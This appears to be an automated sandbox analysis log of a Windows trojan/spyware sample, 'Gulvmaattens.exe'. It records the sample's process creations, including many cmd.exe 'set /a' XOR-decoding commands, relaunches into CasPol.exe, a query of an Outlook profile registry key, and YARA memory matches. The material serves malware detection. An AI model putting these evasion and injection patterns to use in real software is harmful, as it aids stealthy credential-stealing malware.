          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x61^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile created: C:\Users\user\Falder99Jump to behavior
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile created: C:\Users\user\AppData\Local\Temp\nseEC24.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@403/8@0/1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_004021A2 CoCreateInstance,
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_00404858 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:304:WilStaging_02
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Gulvmaattens.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: sqmapi.pdbUGP source: sqmapi.dll.1.dr
          Source: Binary string: sqmapi.pdb source: sqmapi.dll.1.dr

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000001.00000002.51584834701.0000000002AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000008F.00000000.51450296776.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x61^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7D^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x00^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x01^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x70^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x52^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x47^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x4B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x0B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x61^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7D^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x00^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x01^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x70^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x01^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x4B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x70^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x03^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x61^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
